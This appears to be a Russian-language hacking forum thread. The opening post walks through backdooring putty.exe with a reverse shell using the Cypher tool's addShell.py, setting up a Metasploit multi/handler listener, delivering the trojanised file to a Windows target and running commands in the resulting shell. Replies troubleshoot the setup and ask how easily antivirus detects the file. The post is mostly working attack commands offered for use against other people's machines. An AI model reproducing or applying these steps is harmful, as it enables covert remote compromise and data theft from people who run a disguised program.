|
Приветствую! В этой теме я продемонстрирую взлом удаленного хоста с помощью программы Cypher. Она позволит нам добавить полезную нагрузку в исполняемый файл (программу, игру, и т.д) не нарушая его целостности.
https://forum.antichat.xyz/attachmen...f5e283a84a.png В качестве атакующей системы будет использоваться OS Kali Linux, https://forum.antichat.xyz/attachmen...4bb59e83ba.png в качестве целевой системы Windows 8.1 с актуальными обновлениями. https://forum.antichat.xyz/attachmen...259c604b34.png Итак, вернемся к Cypher, скачиваем ее с Github: > git clonehttps://github.com/xan7r/cypher https://forum.antichat.xyz/attachmen...730b18fc5c.png Выполняем следующие команды: > cd cypher > chmod a+x addShell.py > ls –a Теперь нам необходимо выбрать исполняемый файл для «вшивания» в него полезной нагрузки, я взял putty.exe. Скопируем Putty в директорию в Cypher. https://forum.antichat.xyz/attachmen...26ed16956a.png Теперь выполним следующую команду: > ./ addShell.py -f ./putty.exe -H 192.168.0.105 -P 4444 –p 0 https://forum.antichat.xyz/attachmen...0bbb0cea72.png В приведенной команде –p 0 – это тип полезной нагрузки, всего и х в программе доступно 5. · 0 – windows/shell_reverse_tcp · 1 – windows/meterpreter/reverse_http · 2 – windows/meterpreter/reverse_http +PrependMigrate · 3 – windows/meterpreter/reverse_https · 4 – windows/meterpreter/reverse_https +PrependMigrate По итогу получаем файл putty_evil.exe в папке с Cypher. https://forum.antichat.xyz/attachmen...656d7ecdb8.png Теперь настроим на атакующем хосте handler: > msfconsole > use multi/handler > set LPORT 4444 > set LHOST 192.168.0.107 > exploit https://forum.antichat.xyz/attachmen...a5cfe7cd34.png Следующим шагом будет доставка файла putty_evil.exe на целевой хост и последующий запуск приложения. После запуска, мы получаем полноценный command shell, на атакующем хосте. https://forum.antichat.xyz/attachmen...69079b5af0.png Сменим кодировку командой: > chcp 65001 https://forum.antichat.xyz/attachmen...e5db342e2d.png Посмотрим подробную информацию о системе: > systeminfo https://forum.antichat.xyz/attachmen...0ae7a5b4db.png Это все. Спасибо за внимание. |
Цитата:
|
Цитата:
|
Цитата:
|
Win XP Sp3 =)
После активации секунды две и ошибка, за эти секунды успевает только начать коннект (как видно на скрине внизу) =) |
Цитата:
|
Цитата:
|
[*] Sending stage (957487 bytes) to 192.168.1.153
c 10ки пробую. Вот такое сообщение прилетает и все более ничего не происходит в чем может быть трабл? |
Здравствуйте! При создании пэйлоада получаю вот такое сообщение:
пользователь@pc:~/.pentest/cypher$ sudo ./addShell.py -f putty.exe -H 192.168.1.105 -P 4444 -p 0 Traceback (most recent call last): File "./addShell.py", line 2, in import random, optparse, pefile, capstone, binascii, struct, os File "/usr/local/lib/python2.7/dist-packages/capstone/__init__.py", line 230, in raise ImportError("ERROR: fail to load the dynamic library.") ImportError: ERROR: fail to load the dynamic library. Подскажите, пожалуйста, чего ему не хватает? |
Так это джойнер получается. Как у него в целом с палевностью? Есть возможность проверить твой готовый файл, к примеру, на этом сканере?
|
| Время: 02:55 |